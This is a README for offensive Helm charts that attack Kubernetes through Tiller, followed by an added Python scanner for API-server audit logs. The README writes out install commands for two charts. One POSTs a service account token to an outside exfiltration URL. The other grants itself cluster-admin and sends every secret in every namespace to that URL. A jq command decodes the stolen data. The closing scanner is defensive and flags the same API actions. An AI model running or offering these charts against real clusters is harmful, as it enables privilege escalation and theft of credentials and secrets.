About
These are a few Helm Charts I've made to help exfiltrate data or privesc when you're in a Kubernetes Cluster and have access to Tiller, but not to the Kubernetes API.
For more information, see my blogpost about attacking Tiller from inside a cluster: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/
Charts
To use these charts, you must first initialize Helm, then you can install the charts directly from the repo:
$ helm init --client-only
$ helm install --repo https://ropnop.github.io/pentest_charts/ <chart_name> [options]
exfil_sa
This chart deploys a job designed to simply POST the pod's service account token to a URL. This is useful if you have access to Tiller and know a specific service account whose token you'd like to steal. It takes the following values:
- name - the name of the release, job and pod
- serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
- exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
- namespace - defaults to kube-system, but you can override it
Usage:
helm install --name tiller-deployer --set serviceAccountName=tiller --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" --repo https://ropnop.github.io/pentest_charts exfil_sa_token
This will POST the token in the body of an HTTP request to exfilURL.
To clean up: helm delete --purge <release_name>
exfil_secrets
This chart creates a new service account with cluster-admin privileges, then deploys a job with that new service account to read all the secrets in every namespace from the Kubernetes API and POST the data back to an exfilURL.
It takes the following values:
- name - the name of the release, job and pod
- serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
- exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
- namespace - defaults to kube-system, but you can override it
Usage:
helm install --name tiller-deployer --set serviceAccountName="tiller-deployer" --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" --repo https://ropnop.github.io/pentest_charts exfil_secrets
This will POST every Kubernetes secret in JSON form to the exfilURL. To parse through and quickly decode all the secrets, you can use jq:
cat all_secrets.json | jq '[.items[] | . as $secret | .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'
To clean up: helm delete --purge <release_name>
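For the defending side, here is an added example that is not part of these charts: a small Python scanner over Kubernetes API-server audit log lines (audit.k8s.io/v1, one JSON event per line) that flags the two API actions the exfil_secrets chart depends on, a service account creating a ClusterRoleBinding and a service account listing secrets across all namespaces. The sample events, usernames and binding name below are constructed assumptions, not data from a real cluster.

```python
import json
from typing import Iterable, List, Optional, Tuple

# Constructed sample audit events (audit.k8s.io/v1, one JSON object per line);
# the usernames and binding name are assumptions, not data from a real cluster.
SAMPLE_AUDIT_LOG = """\
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"create","user":{"username":"system:serviceaccount:kube-system:tiller"},"objectRef":{"resource":"clusterrolebindings","apiGroup":"rbac.authorization.k8s.io","name":"tiller-deployer-admin"},"requestURI":"/apis/rbac.authorization.k8s.io/v1/clusterrolebindings","responseStatus":{"code":201}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"list","user":{"username":"system:serviceaccount:kube-system:tiller-deployer"},"objectRef":{"resource":"secrets"},"requestURI":"/api/v1/secrets","responseStatus":{"code":200}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"get","user":{"username":"system:serviceaccount:default:app"},"objectRef":{"resource":"secrets","namespace":"default","name":"app-db"},"requestURI":"/api/v1/namespaces/default/secrets/app-db","responseStatus":{"code":200}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","verb":"list","user":{"username":"kubernetes-admin","groups":["system:masters"]},"objectRef":{"resource":"secrets"},"requestURI":"/api/v1/secrets","responseStatus":{"code":200}}
"""

SA_PREFIX = "system:serviceaccount:"


def classify(event: dict) -> Optional[str]:
    """Return a finding label for one audit event, or None if it looks benign."""
    user = event.get("user", {}).get("username", "")
    ref = event.get("objectRef") or {}
    verb = event.get("verb")
    status = event.get("responseStatus", {}).get("code", 0)
    # Only successful requests by service accounts; denied attempts are a separate signal.
    if not user.startswith(SA_PREFIX) or status >= 300:
        return None
    # Rule 1: a service account (Tiller runs as one) granting cluster-scoped RBAC.
    # Coarse on purpose: tune it by allow-listing the deployers known in your cluster.
    if verb == "create" and ref.get("resource") == "clusterrolebindings":
        return "sa-created-clusterrolebinding"
    # Rule 2: a service account enumerating secrets across all namespaces
    # (no namespace in objectRef, i.e. GET /api/v1/secrets).
    if verb == "list" and ref.get("resource") == "secrets" and "namespace" not in ref:
        return "sa-listed-secrets-cluster-wide"
    return None


def scan(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (finding, username) pairs for suspicious events in a JSON-lines audit log."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip it rather than abort the whole scan
        label = classify(event)
        if label:
            findings.append((label, event["user"]["username"]))
    return findings
```

On a real cluster, pass the API server's audit log file object to scan(); the two rules fire only on successful requests, so a 403 on the same endpoints should be watched separately.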